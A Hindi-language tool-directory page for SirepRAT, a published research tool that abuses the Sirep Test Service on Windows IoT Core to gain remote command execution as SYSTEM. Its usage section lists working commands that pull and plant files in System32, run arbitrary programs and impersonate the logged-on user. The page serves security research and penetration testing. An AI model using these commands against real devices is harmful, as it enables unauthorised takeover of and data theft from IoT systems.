Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SirepRAT — Windows IoT Core पर SYSTEM के रूप में रिमोट कमांड निष्पादन (Python2.7 और Python3 के लिए रिलीज़ उपलब्ध) | Kitploit
उपकरण/GitHubGitHub/safebreach-labs/sireprat
IoT सुरक्षाशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubsafebreach-labs/sireprat

SirepRAT

Windows IoT Core पर SYSTEM के रूप में रिमोट कमांड निष्पादन (Python2.7 और Python3 के लिए रिलीज़ उपलब्ध)

रिपॉजिटरी देखें
388915 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SirepRAT

SirepRAT - Windows IoT Core पर SYSTEM के रूप में RCE

SirepRAT में लक्ष्य पर वास्तविक RAT मैलवेयर लिखे बिना पूर्ण RAT क्षमताएँ हैं।

संदर्भ

यह विधि Sirep Test Service का शोषण करती है जो Microsoft की साइट पर उपलब्ध आधिकारिक इमेज में बिल्ट-इन और चल रही है। यह सेवा HLK सेटअप का क्लाइंट भाग है जिसे IoT डिवाइस पर ड्राइवर/हार्डवेयर परीक्षण करने के लिए बनाया जा सकता है। यह Sirep/WPCon/TShell प्रोटोकॉल प्रदान करती है।

हमने Sirep/WPCon प्रोटोकॉल को तोड़ा और प्रदर्शित किया कि कैसे यह प्रोटोकॉल हमलावरों के लिए एक दूरस्थ कमांड इंटरफ़ेस उजागर करता है, जिसमें RAT क्षमताएँ जैसे मनमाने फ़ाइलों को मनमाने स्थानों पर प्राप्त/रखना और सिस्टम जानकारी प्राप्त करना शामिल है।

सेवा और प्रोटोकॉल के बारे में इस शोध से प्राप्त निष्कर्षों के आधार पर, हमने एक सरल पायथन टूल बनाया जो विभिन्न समर्थित कमांड का उपयोग करके उनका शोषण करने की अनुमति देता है। हमने इसे SirepRAT नाम दिया।

इसमें Windows IoT Core लक्ष्य पर कमांड भेजने के लिए एक आसान और सहज उपयोगकर्ता इंटरफ़ेस है। यह किसी भी केबल-कनेक्टेड डिवाइस पर काम करता है जो आधिकारिक Microsoft इमेज के साथ Windows IoT Core चला रहा है।

स्लाइड्स और व्हाइट पेपर

स्लाइड्स और शोध व्हाइट पेपर docs फ़ोल्डर में हैं

सेटअप

root@kitploit:~
pip install -r requirements.txt

उपयोग

फ़ाइल डाउनलोड करें

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

फ़ाइल अपलोड करें

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

मनमाना प्रोग्राम चलाएँ

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

तर्कों के साथ, वर्तमान में लॉग इन उपयोगकर्ता के रूप में प्रतिरूपित:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(SYSTEM निष्पादन क्षमता प्रदर्शित करने के लिए as_logged_on_user फ़्लैग के बिना इसे चलाने का प्रयास करें)

सिस्टम जानकारी प्राप्त करें

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

फ़ाइल जानकारी प्राप्त करें

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

पूर्ण विवरण के लिए सहायता देखें:

root@kitploit:~
python SirepRAT.py --help

लेखक

Dor Azouri (@bemikre)

योगदानकर्ता

movatica (@movatica) - Python 3 में पोर्टिंग! (2020 की समाप्ति रेखा पर)

लाइसेंस

BSD 3 - "New" या "Revised" लाइसेंस क्लॉज़

टूल डाउनलोड करें